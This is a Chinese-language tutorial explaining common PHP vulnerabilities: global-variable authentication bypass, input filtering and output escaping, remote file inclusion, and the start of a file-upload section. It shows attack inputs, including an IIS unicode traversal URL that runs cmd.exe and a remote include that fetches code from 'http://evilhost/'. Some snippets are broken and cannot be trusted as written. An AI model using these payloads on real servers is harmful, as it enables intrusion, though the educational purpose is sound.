PHP漏洞原理

PHP漏洞原理

PHP是一种服务器端的，嵌入HTML的脚本语言。PHP区别其他语言的地方是它的代码在服务器端执行，例如收集表格数据,生成动态页面内容,或者收发cookies等，今天我们来了解一下它的漏洞问题。

一全局变量

全局变量，就是能够在整个程序执行的过程中都存在的变量。基于PHP的应用程序的主函数一般都是接受用户的输入，然后对输入数据进行处理，然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易，实际上PHP是把这些输入数据看作全局变量来处理的。

这段代码会显示一个文本框和提交按钮。当用户点击提交按钮时，页面就会将用户输入的数据传递到“get.php”，当“get.php”运行时，“$test”就会自动创建，包含了用户在文本框输入的数据。我们可以看出，攻击者可以按照自己的意愿创建任意的全局变量。下面的认证代码暴露了PHP的全局变量所导致的安全问题：

if ($password == "monster")

$pass = 1;

……………

if ($pass == 1)

echo "认证通过";

?>

上面的代码首先检查用户的密码是否为“monster”，如果匹配的话，则设置“$pass”为“1”，之后如果“$pass”的值为“1”的话，就会认证通过。

从表面看起来，这是正确的，但是这段代码犯了想当然的错误，它假定“$pass”在没有设置值的时候是空的，却没有想到,攻击者可以创建任何全局变量并赋值，通过提交“http://server/get.php?pass=1”的方法，我们完全可以欺骗这段代码，使它相信我们是已经认证过的。

二过滤输入/输出转义

过滤是Web应用安全的基础。它是你验证数据合法性的过程。通过在输入时确认对所有的数据进行过滤，你可以避免未过滤数据在你的程序中被误信及误用。大多数流行的PHP 应用的漏洞最终都是因为没有对输入进行恰当过滤造成的。最好的方法是把过滤看成是一个检查的过程。

另外一个Web应用安全的基础是对输出进行转义或对特殊字符进行编码，以保证原意不变。例如，O'Reilly在传送给MySQL数据库前需要转义成O\'Reilly。单引号前的反斜杠代表单引号是数据本身的一部分，而不是并不是它的本义。

为了区分数据是否已转义，还是建议定义一个命名机制。对于输出到客户机的转义数据，使$html数组进行存储，该数据首先初始化成一个空数组，对所有已过滤和已转义数据进行保存。

$html = array( );

$html['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8');

echo "

Welcome, {$html['username']}.

?>

htmlspecialchars( )函数与htmlentities( )函数基本相同，它们的参数定义完全相同，只不过是htmlentities( )的转义更为彻底。

通过$html['username']把username输出到客户端，你就可以确保其中的特殊字符不会被浏览器所错误解释。如果username只包含字母和数字的话，实际上转义是没有必要的，但是这体现了深度防范的原则。

SQL 注入是PHP应用中最常见的漏洞之一，事实上，开发者需要同时犯以上两个错误才会引发一个SQL注入漏洞。

三远程文件

PHP是一种具有丰富特性的语言，提供了大量的函数，使编程者实现某个功能很容易。但是从安全的角度来看，功能越多，要保证它的安全性就越难，远程文件就是说明这个问题的一个很好的例子：

if (!($fo = fopen("$file", "s"))

echo("文件$file打开错误");

?>

上面的脚本试图打开文件“$filename”，如果失败就显示错误信息。那么如果我们能够指定“$file”的话，就能利用这个脚本浏览任何文件。但是，这个脚本还存在一个不太明显的特性，那就是它可以从任何其它WEB或FTP站点读取文件。实际上，PHP的大多数文件处理函数对远程文件的处理是透明的。

例如：

如果指定“$file”为“http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir”,则上面的代码实际上是利用主机target上的unicode漏洞，执行了dir命令。

这使得支持远程文件的include()，require()，include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容，并且把它们按照PHP代码解释。

例如：

include($dir."/ attack.php");

?>

上例中“$dir”一般是一个在执行代码前已经设置好的路径，如果攻击者能够使得“$dir”没有被设置的话，那么他就可以改变这个路径。但是攻击者并不能做任何事情，因为他们只能在他们指定的路径中访问文件“attack.php”。但是由于有了对远程文件的支持，攻击者就可以做任何事情。例如，攻击者可以在某台服务器上放一个文件“attack.php”，里面包含了恶意代码

然后把“$dir”设置为“http://evilhost/”，这样我们就可以在目标主机上执行上面的恶意代码，将结果返回到客户的浏览器中。

需要注意的是，攻击服务器（也就是evilhost）应该不能执行PHP代码，否则攻击代码会在攻击服务器，而不是目标服务器执行。

四文件上载

PHP自动支持基于RFC 1867的文件上载，我们看下面的例子：